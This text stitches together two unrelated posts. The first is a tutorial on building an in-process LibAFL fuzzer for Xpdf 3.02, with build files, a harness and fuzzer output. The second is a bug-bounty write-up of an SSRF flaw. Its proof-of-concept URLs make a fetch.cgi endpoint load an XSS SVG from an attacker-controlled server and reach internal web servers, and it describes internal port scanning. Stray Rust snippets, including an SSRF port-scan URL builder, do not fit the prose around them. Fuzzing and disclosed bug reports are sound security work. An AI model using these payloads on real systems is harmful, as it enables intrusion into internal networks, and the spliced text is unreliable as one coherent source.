Those are the rough steps for swapping out the executor. As mentioned at the start of this post, this change typically improves a fuzzer's performance significantly. Let's see if that holds true for us.

Statically Compiling Xpdf

We'll begin our swap by statically compiling Xpdf. We start here because this is truly the make-or-break step. If we can't statically compile Xpdf into a library, we'd probably be better off exploring alternatives like persistent-mode fuzzing. The statically compiled Xpdf libraries will eventually be linked into our fuzz target, allowing us to exercise the code we're interested in fuzzing.


Unfortunately, they only offer version 4.02, a major version newer than our target. That means we need to build Xpdf 3.02 ourselves. Well, sort of; we can still lean heavily on the work done in the libxpdf repository, it just requires a little extra effort on our part.

Make to CMake

If we check out the Xpdf repository at any point after version 4.0, we can see that they moved their build system from Make to CMake. That's a hurdle (at least for me; if you know of an easier way to do the conversion, I'm all ears), but not a huge one. We can simply grab the CMake-related files from the 4.0+ repository and drop them into our local 3.02 repository.

What we're after are all the CMake-related files in the 4.0 folder. We first need to find them all and place them at the same relative locations in our 3.02 folder. Since there were so few, I just mv'd them by hand.

find xpdf | grep cmake


With those files in place in the 3.02 folder, we can attempt a build with CMake. We'll use CMake's recommended "out of source" build strategy, meaning we'll build in a directory separate from the target and pass cmake the location of the CMakeLists.txt as an argument.


mkdir build 
cd build
cmake ../xpdf

When we do, a pile of errors shows up, mostly about attempts to compile files that don't exist. To get things working, we just need to iteratively build, read the error output, and tweak the CMake files until the target builds. In the end, the following changes were needed to get everything working.



add_library(fofi_objs OBJECT
  FoFiBase.cc
  FoFiEncodings.cc
  FoFiIdentifier.cc
  FoFiTrueType.cc
  FoFiType1.cc
  FoFiType1C.cc
)

add_library(fofi STATIC
  $<TARGET_OBJECTS:fofi_objs>
)

add_library(xpdf_objs OBJECT
  AcroForm.cc
  Annot.cc
  Array.cc
  BuiltinFont.cc
  BuiltinFontTables.cc
  Catalog.cc
  CharCodeToUnicode.cc
  CMap.cc
  Decrypt.cc
  Dict.cc
  Error.cc
  FontEncodingTables.cc
  Form.cc
  Function.cc
  Gfx.cc
  GfxFont.cc
  GfxState.cc
  GlobalParams.cc
  JArithmeticDecoder.cc
  JBIG2Stream.cc
  JPXStream.cc
  Lexer.cc
  Link.cc
  NameToCharCode.cc
  Object.cc
  OptionalContent.cc
  Outline.cc
  OutputDev.cc
  Page.cc
  Parser.cc
  PDF417Barcode.cc
  PDFDoc.cc
  PDFDocEncoding.cc
  PSTokenizer.cc
  SecurityHandler.cc
  Stream.cc
  TextString.cc
  UnicodeMap.cc
  UnicodeRemapping.cc
  UnicodeTypeTable.cc
  UTF8.cc
  XFAForm.cc
  XRef.cc
  Zoox.cc
)

  set(SPLASH_LIB splash)
  set(SPLASH_OBECTS $<TARGET_OBJECTS:splash_objs>)
  set(SPLASH_OUTPUT_DEV_SRC "SplashOutputDev.cc")
else()
  set(SPLASH_LIB "")
  set(SPLASH_OBECTS "")
  set(SPLASH_OUTPUT_DEV_SRC "")
endif()

add_library(xpdf STATIC
  $<TARGET_OBJECTS:xpdf_objs>
  $<TARGET_OBJECTS:goo_objs>
  $<TARGET_OBJECTS:fofi_objs>
  ${SPLASH_OBECTS}
  $<TARGET_OBJECTS:${FREETYPE_LIBRARY}>
  PreScanOutputDev.cc
  PSOutputDev.cc
  ${SPLASH_OUTPUT_DEV_SRC}
  TextOutputDev.cc
  HTMLGen.cc
  WebFont.cc
  ImageOutputDev.cc
)

Now we should be able to statically compile xpdf with afl++.


cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_C_COMPILER=afl-clang-lto -DCMAKE_CXX_COMPILER=afl-clang-lto++ ../xpdf/


ls -al */*.a 

-rw-rw-r-- 1 epi epi   417288 Nov 13 20:02 goo/libgoo.a
-rw-rw-r-- 1 epi epi   898772 Nov 13 20:02 fofi/libfofi.a
-rw-rw-r-- 1 epi epi   964732 Nov 13 20:03 splash/libsplash.a
-rw-rw-r-- 1 epi epi 12133702 Nov 13 20:03 xpdf/libxpdf.a

Not too shabby! We now have instrumented static libraries we can use while fuzzing (we'll swap in our own compiler in place of afl's later). Before we start modifying our fuzzer, let's write the code that will use our freshly compiled libraries (a.k.a. our fuzz target / harness / the code we'll actually fuzz)... onward!


First, let's clear up some nomenclature. What we're about to write is (in my experience) most commonly called a harness. In libFuzzer's documentation, it's called a fuzz target. They're the same thing, but harness is easier to type, so we'll stick with that.

A harness is just a function that accepts an array of bytes and the size of that array as parameters, then uses them to call into the target library under test. While building a harness (modified from the libFuzzer docs), we need to keep the following in mind:

  • The fuzzing engine will execute the fuzz target many times with different inputs within the same process.
  • It must not exit() on any input.
  • It must be fast. Try to avoid cubic or greater complexity, logging, or excessive memory consumption.

Because our harness will be executed over and over within the same process, we need to make sure we don't leak memory or reach a call to exit. We also want to limit the amount of code we run to only what's strictly necessary for the paths we want the fuzzer to take. Since we already have a driver we know to be vulnerable (pdftotext), we can simply look at it to see what our harness should do.
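Those constraints can be sketched as a tiny, self-contained function. This is only a Rust illustration of the harness contract, not the C++ harness we'll actually write, and fuzz_one is a made-up name:

```rust
// Illustrative sketch of the harness contract: a function the engine calls
// repeatedly in one process with fuzzer-controlled bytes. It must return
// instead of exiting, and must not leak per-iteration allocations.
fn fuzz_one(data: &[u8]) -> i32 {
    // reject inputs too small to be interesting, but *return*, never exit()
    if data.len() < 4 {
        return 0;
    }
    // ... hand `data` to the library under test here ...
    0 // always 0; crashes are detected by the engine, not the return value
}

fn main() {
    // the engine would drive this loop with mutated inputs
    assert_eq!(fuzz_one(b"%PDF-1.4"), 0);
}
```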

Our goal here is to preserve the semantics of the original program while ripping out its guts to make it easier to fuzz (rough quote from @h0mbre). We're primarily interested in code that creates a PDFDoc instance or calls methods on it. Below is everything we need to replicate that behavior in our harness.


  doc = new PDFDoc(fileName, ownerPW, userPW);

  if (!doc->isOk()) {

  if (!doc->okToCopy()) {

  if (lastPage < 1 || lastPage > doc->getNumPages()) {
    lastPage = doc->getNumPages();

  delete doc;

With the code we care about extracted, it's time to write our harness. The function signature seen below, LLVMFuzzerTestOneInput, is supported by many (all?) of the major fuzzing frameworks. That means we can write a single harness and use it with libFuzzer, AFL++, Honggfuzz, etc.

#include <fstream>
#include <iostream>
#include <stdint.h>
#include "PDFDoc.h"
#include "goo/gtypes.h"
#include "XRef.h"

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    int lastPage = 0;

    GString *user_pw = NULL;
    GString *owner_pw = NULL;
    GString *filename = NULL;

    Object obj;

    // stream is cleaned up when doc's destructor fires
    MemStream *stream = new MemStream((char *)data, 0, size, &obj);

    PDFDoc *doc = new PDFDoc(stream, owner_pw, user_pw);

    if (doc->isOk() && doc->okToCopy()) {
        lastPage = doc->getNumPages();
    }

    if (doc) { delete doc; }

    return 0;
}


We also need to make one small modification to the Xpdf code, specifically in xpdf/goo/gmem.cc. Recall from above that code in/used by the harness must not call exit on any input. Well, it just so happens there's a code path our fuzzer will execute that leads to a call to exit(1).

We can fix that by replacing the call to exit with a call to std::abort(). Calling abort allows the fuzzer to catch the crash and restart, whereas calling exit would simply bring our efforts to a halt.

  if (objSize <= 0 || nObjs < 0 || nObjs >= INT_MAX / objSize) {
#if USE_EXCEPTIONS
    throw GMemException();
#else
    fprintf(stderr, "nObjs: %d objSize: %d\n", nObjs, objSize);
    fprintf(stderr, "Bogus memory allocation size\n");
    // exit(1);
    std::abort();
#endif
  }
  return gmalloc(n);
}

void *greallocn(void *p, int nObjs, int objSize) GMEM_EXCEP {
  int n;

  if (nObjs == 0) {
    if (p) {
      gfree(p);
    }
    return NULL;
  }
  n = nObjs * objSize;
  if (objSize <= 0 || nObjs < 0 || nObjs >= INT_MAX / objSize) {
#if USE_EXCEPTIONS
    throw GMemException();
#else
    fprintf(stderr, "p: %p nObjs: %d objSize %d\n", p, nObjs, objSize);
    fprintf(stderr, "Bogus memory allocation size\n");
    // exit(1);
    std::abort();
#endif
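As an aside, the allocation-size guard above is a classic integer-overflow check. Here is the same logic as a standalone Rust sketch (illustrative only, not part of the fuzzer), using checked_mul in place of the INT_MAX division trick:

```rust
// Same "bogus allocation size" logic as gmallocn, sketched in Rust:
// reject non-positive element sizes, negative counts, and products
// that would overflow.
fn safe_alloc_size(n_objs: i64, obj_size: i64) -> Option<i64> {
    if obj_size <= 0 || n_objs < 0 {
        return None;
    }
    // checked_mul returns None on overflow, mirroring the division guard
    n_objs.checked_mul(obj_size)
}
```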



We need to add libafl_cc as a project dependency, along with libafl_targets. We chose to use folders on the filesystem so that we could incorporate some of the newer changes the LibAFL team has made recently; specifically, for the purposes of this post, commit 23f02dae12bfa49dbcb5157aee6e0c6ddaeddcd0. We also need to change the crate type to a static library.


# commit 23f02dae12bfa49dbcb5157aee6e0c6ddaeddcd0
libafl = { path = "../LibAFL/libafl" }
libafl_cc = { path = "../LibAFL/libafl_cc" }
libafl_targets = { path = "../LibAFL/libafl_targets" , features = ["libfuzzer", "sancov_pcguard_hitcounts"] }

name = "exerciseone"
crate-type = ["staticlib"]

Additionally, our compiler will be an executable binary. We can use Rust's bin folder convention, which says that any file in the src/bin folder should be compiled as a standalone executable.


Cool, now we can add the compiler code. If you look at the fuzzer examples in the LibAFL repository, most of them use the same compiler code. What's shown below is lightly modified for clarity.


use libafl_cc::{ClangWrapper, CompilerWrapper};
use std::env;

pub fn main() {
    let cwd = env::current_dir().unwrap();
    let args: Vec<String> = env::args().collect();

    let mut cc = ClangWrapper::new();

    let is_cpp = env::current_exe().unwrap().ends_with("compiler_pp");

    if let Some(code) = cc
        .cpp(is_cpp)
        .from_args(&args)
        .expect("Failed to parse the command line")
        .link_staticlib(&cwd, "exerciseone")
        .add_arg("-fsanitize-coverage=trace-pc-guard")
        .run()
        .expect("Failed to run the wrapped compiler")
    {
        std::process::exit(code);
    }
}

A few notes about the code above: "compiler_pp" will be the name of our c++ compiler wrapper; we pass the name of our crate's static library as an argument to the .link_staticlib call; and "-fsanitize-coverage=trace-pc-guard" is the SanitizerCoverage option discussed here, which basically lets us track edge coverage.
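The is_cpp check boils down to a file-name test on the wrapper binary itself. A self-contained sketch of that dispatch (is_cpp_wrapper is a hypothetical helper for illustration, not LibAFL API):

```rust
use std::path::Path;

// Decide C vs C++ mode from the wrapper executable's own name, mirroring
// the env::current_exe().ends_with("compiler_pp") check above.
fn is_cpp_wrapper(exe: &Path) -> bool {
    exe.file_name()
        .map(|name| name.to_string_lossy().ends_with("_pp"))
        .unwrap_or(false)
}
```

Installing the same binary under two names (compiler and compiler_pp) is what lets one wrapper serve as both CC and CXX.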

Ok, finally, we just need to add our c++ compiler, which will simply call the compiler code above.


pub mod compiler;

fn main() {
    compiler::main()
}
Sweet! We have a c and a c++ compiler, backed by clang, that add SanitizerCoverage-based coverage instrumentation to anything they compile.





After that, we can begin modifying the fuzzer. In keeping with the binary-to-library switch, we need to rename the main function and add the no_mangle attribute. The no_mangle attribute instructs rustc to keep the symbol's name as-is; otherwise, it could end up looking like _ZN6afl_main17heb3ea72ba341fa07E.

#[no_mangle]
pub fn libafl_main() -> Result<(), Error> {


Next, we need to update how we observe edge coverage. In the ForkserverExecutor-based fuzzer, we automatically got a pointer to shared memory from the __AFL_SHM_ID environment variable, but since this fuzzer now uses an InProcessExecutor, we need to use the EDGES_MAP from the libafl_targets crate's coverage module.

When we used afl-clang-[fast|lto] for instrumentation, the compiler inserted the edge coverage map pointed to by __AFL_SHM_ID, and we could use that variable to get a pointer to the map. This time we're using libafl_cc, which uses the SanitizerCoverage backend. As a result, the __AFL_SHM_ID environment variable won't be populated, so we need to use the EDGES_MAP exposed by libafl_targets.

Special thanks to @toka from the Awesome Fuzzing Discord server for taking the time to help me with/explain this.

let edges = unsafe { &mut EDGES_MAP[0..MAX_EDGES_NUM] };
let edges_observer = HitcountsMapObserver::new(StdMapObserver::new("edges", edges));
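To make the coverage-map idea concrete, here is a tiny self-contained sketch of how an AFL-style edges map behaves (illustrative only; the real EDGES_MAP is written by the compiler-inserted instrumentation, not by hand):

```rust
const MAP_SIZE: usize = 65536;

// Instrumentation bumps a per-edge counter; the wrapping add mirrors the
// hitcount behavior that HitcountsMapObserver later bucketizes.
fn hit_edge(map: &mut [u8; MAP_SIZE], edge_id: usize) {
    let idx = edge_id % MAP_SIZE;
    map[idx] = map[idx].wrapping_add(1);
}

// After each run, the fuzzer scans the map; a nonzero slot that was
// previously zero means new coverage was found.
fn covered_edges(map: &[u8; MAP_SIZE]) -> usize {
    map.iter().filter(|&&count| count > 0).count()
}
```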

Since we're using the EDGES_MAP, we can't use our own map size definition, so we'll update our objective_state as well.

let objective_state = MapFeedbackState::new("timeout_edges", unsafe { EDGES_MAP.len() });


Because we'll be running the harness in the same process space as the fuzzer, anything the harness prints to stdout/err would show up mixed in with the fuzzer's output. We don't want a bunch of garbage interleaved with our fuzzer stats, so we'll swap the old SimpleStats component for a MultiMonitor. The Monitor component is the new name for the old Stats component; the Stats and State component names were too similar, so we now use Monitor components instead.

MultiMonitor displays cumulative as well as per-client statistics. It uses LibAFL's low-level message passing protocol (LLMP) to communicate between a broker and its clients. The broker is spawned the first time the fuzzer is run, and any fuzzer processes started while the broker is alive are treated as clients. Of note, the first time a client connects to the broker, the output will show 2 active clients.

When asked about this behavior, @domenukk had this to say:

The 0th client is the client that opens the network socket and listens for other clients and potential brokers. From llmp's perspective it's still a client, so it's more or less an implementation detail.

The actual code is just as simple as the SimpleStats it replaces.

let monitor = MultiMonitor::new(|s| {
    println!("{}", s);
});

With this change, our broker instance prints our stats, while each client's stdout/err prints to its respective terminal.

broker terminal

[LibAFL/libafl/src/bolts/llmp.rs:600] "We're the broker" = "We're the broker"
Doing broker things. Run this tool again to start fuzzing in a client.
[LibAFL/libafl/src/bolts/llmp.rs:2187] "New connection" = "New connection"
[LibAFL/libafl/src/bolts/llmp.rs:2187] addr =
[LibAFL/libafl/src/bolts/llmp.rs:2187] stream.peer_addr().unwrap() =
[Stats       #1]  (GLOBAL) clients: 2, corpus: 0, objectives: 0, executions: 0, exec/sec: 0
                  (CLIENT) corpus: 0, objectives: 0, executions: 0, exec/sec: 0, edges: 299/17128 (1%)
client terminal

We're the client (internal port already bound by broker, Os {
    code: 98,
    kind: AddrInUse,
    message: "Address already in use",
Connected to port 1337
[LibAFL/libafl/src/events/llmp.rs:833] "Spawning next client (id {})" = "Spawning next client (id {})"
[LibAFL/libafl/src/events/llmp.rs:833] ctr = 0


In the forkserver version of our fuzzer, we used a SimpleEventManager. This time, we need an LlmpRestartingEventManager. The LlmpRestartingEventManager performs the same basic functions as the SimpleEventManager, but it can also restart its associated fuzzer, preserving the fuzzer's state between separate executions. This means that each time a child crashes or times out, the LlmpRestartingEventManager will spawn a new process and fuzzing will continue. In the call to setup_restarting_mgr_std, we pass in the MultiMonitor, the port on which the broker will listen (1337), and EventConfig::AlwaysUnique. The LlmpRestartingEventManager only uses the EventConfig to distinguish individual fuzzers by their configuration.

One of the reasons we want the restarting behavior is to periodically clear out the "cruft" left behind by thousands of prior harness executions, so we can start with a clean slate.

let (state, mut mgr) = match setup_restarting_mgr_std(monitor, 1337, EventConfig::AlwaysUnique)
{
    Ok(res) => res,
    Err(err) => match err {
        Error::ShuttingDown => {
            return Ok(());
        }
        _ => {
            panic!("Failed to setup the restarting manager: {}", err);
        }
    },
};

Next, we need to grab the State from the EventManager. On the initial pass, the setup_restarting_mgr_std call above returns (None, LlmpRestartingEventManager). On each successive execution (i.e. whenever the fuzzer restarts), it returns the previous run's State, which was saved off in shared memory. The code below handles the initial None value by providing a default StdState. After the first restart, we'll simply unwrap the Some(StdState) returned from the call to setup_restarting_mgr_std.

let mut state = state.unwrap_or_else(|| {
    StdState::new(
        // random number generator with a time-based seed
        StdRand::with_seed(current_nanos()),
        // corpus that stores fuzzer-generated inputs in memory
        InMemoryCorpus::new(),
        // corpus in which to store solutions on disk
        OnDiskCorpus::new(PathBuf::from("./timeouts")).unwrap(),
        // States of the feedbacks that store the data related to the feedbacks that should be
        // persisted in the State.
        tuple_list!(feedback_state, objective_state),
    )
});


The code below is a Rust closure. It's responsible for accepting bytes that have been mutated by the fuzzer and sending them off to the LLVMFuzzerTestOneInput in our harness.cc.

let mut harness = |input: &BytesInput| {
    let target = input.target_bytes();
    let buffer = target.as_slice();

    // call into LLVMFuzzerTestOneInput in harness.cc
    libfuzzer_test_one_input(buffer);

    ExitKind::Ok
};


Here we have the component of the hour, the InProcessExecutor! We pass in all of its components and then wrap it in a TimeoutExecutor so that we keep the same timeout behavior we had before.

let in_proc_executor = InProcessExecutor::new(
    &mut harness,
    tuple_list!(edges_observer, time_observer),
    &mut fuzzer,
    &mut state,
    &mut mgr,
)?;

let mut executor = TimeoutExecutor::new(in_proc_executor, timeout);


Finally, we have the Fuzzer component. Instead of using the fuzz_loop method again, which loops forever, we'll use fuzz_loop_for, which runs only 10,000 fuzzing iterations before moving on. This allows the fuzzer to exit and restart, letting us clean house every so often.

Since fuzz_loop_for in our restart scenario only runs 10,000 iterations before exiting, we need to make sure we call on_restart and pass it our current state. That way, the state will be available to the next respawned fuzzer process.

fuzzer
    .fuzz_loop_for(&mut stages, &mut executor, &mut state, &mut mgr, 10000)?;

mgr.on_restart(&mut state).unwrap();
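The run-then-persist cycle can be sketched in plain Rust (names are illustrative; in LibAFL the state is actually serialized into shared memory for the respawned process to pick up):

```rust
// Stand-in for the fuzzer's persistent state.
struct FuzzState {
    executions: u64,
}

// Run a bounded number of iterations, like fuzz_loop_for(..., 10000).
fn fuzz_loop_for(state: &mut FuzzState, iterations: u64) {
    for _ in 0..iterations {
        state.executions += 1; // stand-in for one mutate+execute cycle
    }
}

// Hand the state back before exiting, like mgr.on_restart(&mut state),
// so the respawned process continues where this one left off.
fn on_restart(state: &FuzzState) -> u64 {
    state.executions
}
```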


With all the necessary changes in place, we can write the glue that makes everything work. I recently came across the cargo-make project, and it's incredibly powerful. We'll use it here to manage our build and clean steps. Our primary motivation for using it is that Rust's build.rs build scripts have no analogous clean script. In the past I'd normally just augment my build script with a Makefile, but no more! Now it's Makefile.toml or bust.

At a high level, we can run cargo make rebuild to clean everything, build the compilers, and then use those compilers to compile xpdf and our harness.

exercise-1/Makefile.toml

[tasks.clean]
dependencies = ["cargo-clean", "afl-clean", "clean-xpdf"]

[tasks.afl-clean]
script = '''
rm -rf .cur_input* timeouts fuzzer fuzzer.o libexerciseone.a
'''

[tasks.clean-xpdf]
cwd = "xpdf"
script = """
make --silent clean
rm -rf built-with-* ../build/*
"""

[tasks.cargo-clean]
command = "cargo"
args = ["clean"]

[tasks.rebuild]
dependencies = ["afl-clean", "clean-xpdf", "build-compilers", "build-xpdf", "build-fuzzer"]

[tasks.build-compilers]
script = """
cargo build --release
cp -f ../target/release/libexerciseone.a .
"""

[tasks.build-xpdf]
cwd = "build"
script = """
cmake ../xpdf -DCMAKE_BUILD_TYPE=Release -DCMAKE_C_COMPILER=$(pwd)/../../target/release/compiler -DCMAKE_CXX_COMPILER=$(pwd)/../../target/release/compiler_pp
"""

[tasks.build-fuzzer]
script = """
../target/release/compiler_pp -I xpdf/goo -I xpdf/fofi -I xpdf/splash -I xpdf/xpdf -I xpdf -o fuzzer harness.cc build/*/*.a -lm -ldl -lpthread -lstdc++ -lgcc -lutil -lrt
"""

After we run cargo make rebuild, we're left with the fuzzer binary in the exercise-1 directory.


ls -al fuzzer

-rwxrwxr-x  1 epi epi 24446960 Nov 13 20:03 fuzzer



Window 1: broker


[LibAFL/libafl/src/bolts/llmp.rs:600] "We're the broker" = "We're the broker"
Doing broker things. Run this tool again to start fuzzing in a client.

Window 2: client

taskset -c 6 ./fuzzer

We're the client (internal port already bound by broker, Os {
    code: 98,
    kind: AddrInUse,
    message: "Address already in use",
Connected to port 1337
[LibAFL/libafl/src/events/llmp.rs:833] "Spawning next client (id {})" = "Spawning next client (id {})"
[LibAFL/libafl/src/events/llmp.rs:833] ctr = 0
Awaiting safe_to_unmap_blocking
We're a client, let's fuzz :)
First run. Let's set it all up
Loading file "./corpus/sample.pdf" ...
We imported 1 inputs from disk.


[Stats       #1]  (GLOBAL) clients: 2, corpus: 454, objectives: 7, executions: 195316, exec/sec: 13500
                  (CLIENT) corpus: 454, objectives: 7, executions: 195316, exec/sec: 13500, timeout_edges: 619/17129 (3%), edges: 614/17129 (3%)
[Stats       #1]  (GLOBAL) clients: 2, corpus: 454, objectives: 7, executions: 195316, exec/sec: 13500
                  (CLIENT) corpus: 454, objectives: 7, executions: 195316, exec/sec: 13500, timeout_edges: 619/17129 (3%), edges: 614/17129 (3%)
[Testcase    #1]  (GLOBAL) clients: 2, corpus: 455, objectives: 7, executions: 196431, exec/sec: 13569
                  (CLIENT) corpus: 455, objectives: 7, executions: 196431, exec/sec: 13635, timeout_edges: 619/17129 (3%), edges: 614/17129 (3%)
[Stats       #1]  (GLOBAL) clients: 2, corpus: 455, objectives: 7, executions: 196431, exec/sec: 13087
                  (CLIENT) corpus: 455, objectives: 7, executions: 196431, exec/sec: 12573, timeout_edges: 619/17129 (3%), edges: 614/17129 (3%)
[Stats       #1]  (GLOBAL) clients: 2, corpus: 455, objectives: 7, executions: 196431, exec/sec: 12092
                  (CLIENT) corpus: 455, objectives: 7, executions: 196431, exec/sec: 11641, timeout_edges: 619/17129 (3%), edges: 614/17129 (3%)

Alright! We've sped up our original fuzzer by roughly an order of magnitude, give or take. You can see from the output that there's quite a bit of variance on my machine. Even cooler is that we can now run another fuzzer instance for each available core on the machine.

That's it for this post. In the next one, we'll tackle exercise #2 from Fuzzing101!


  1. Fuzzing101
  2. AFL++
  3. LibAFL
  4. fuzzing-101-solutions repository
  5. libxpdf
  6. libFuzzer documentation
  7. SanitizerCoverage – trace-pc-guard

Simple SSRF Allows Access To Internal Assets

Brief Description

While taking a look at one of the host targets at Synack, everything seemed to be a dead end: only two hosts were in scope, and one of them was hosting a web server. The web server was a login page for mailing services, but by doing an nslookup on the host's IP, it was possible to gather more information once the domain was identified.


Reconnaissance Steps

Once the host's domain was identified, there were several dead ends after trying some common content-discovery techniques and looking at endpoints in JavaScript files. Despite those dead ends, there was a CGI file called fetch.cgi that returned a 500 HTTP status code when visited; given the file's suspicious name, parameter brute forcing was performed.


While brute forcing parameters, tools such as x8, arjun, and param-miner were used, but no helpful results were found. Eventually, by using ffuf with a custom wordlist, the parameter REDIRECT was found after parameter fuzzing. The following command was used along with a custom wordlist:


When using ffuf for this, don't forget to filter words according to the results with the -fw flag to get better output. After performing parameter fuzzing and finding the REDIRECT parameter, the request was sent to the Repeater tab for further analysis; fetching an external file from my VPS ended up with a 200 status code in the HTTP response.



Getting an HTTP request to my VPS proves the existence of the flaw, but there is still the task of proving impact.


Exploitation and Impact

As SSRF is not a vulnerability I know particularly well, gathering resources from the internet was helpful. From those resources, the following options emerged.


Internal Port Scanning:
By reading the article “SSRF – Server Side Request Forgery (Types and ways to exploit it) Part-1” by @Madrobot_, it was possible to run a port scan to identify other internal services. For this process, ffuf was handy along with a list of all ports. Unfortunately, no additional services were found. The following command was used.

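The exact ffuf command isn't reproduced in the write-up, but conceptually the scan just generates one SSRF probe URL per candidate port and checks which ones respond. A sketch of that idea (the helper function is hypothetical; the parameter name mirrors the report):

```rust
// Build one SSRF probe URL per candidate internal port, the same idea a
// ffuf port wordlist implements against the REDIRECT parameter.
fn ssrf_port_scan_urls(base: &str, target: &str, ports: &[u16]) -> Vec<String> {
    ports
        .iter()
        .map(|port| format!("{}?REDIRECT=http://{}:{}/", base, target, port))
        .collect()
}
```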


Reflected XSS:


It's possible to obtain reflected XSS through the SSRF flaw by fetching resources from an external URL. Unfortunately, reflected XSS is not accepted for host targets at Synack, but it was included in the report as a proof of concept for the SSRF flaw.


  • https://webmail.domain.vi/fetch.cgi?REDIRECT=http://controlled-server/xss.svg


Fetching Inaccessible Internal Web Servers


As the two methods explained above did not show enough impact, the next step was to fetch internal web servers by fuzzing internal ranges as SSRF payloads. A list of ranges gathered using Hurricane Electric's services came in handy, as did the best-dns-wordlist.txt wordlist from Assetnote. ffuf was again useful for this task with the following commands:


After the fuzzing, another nginx server and an IIS server were found on an internal IP and an internal domain. I did not proceed with further content discovery on the internal servers, as I would just have ended up reporting the flaw again. The following proofs of concept for internal web servers were found:


nginx server:


  • https://webmail.domain.vi/fetch.cgi?REDIRECT=http://internal-ip/


IIS server:


  • https://webmail.domain.vi/fetch.cgi?REDIRECT=http://skypeav.domain.vi/


After a few days of back and forth with Vuln Ops, the vulnerability was accepted and rewarded.



Takeaways

Fuzzing can be useful when used correctly; in this case it helped discover internal web servers and parameters. Also, being able to collect information about the server, such as IP ranges and possible domains, comes in handy when exploiting the flaw.


Thanks for making it to the end!

If you want to chat or just connect, feel free to shoot a direct message on Twitter.
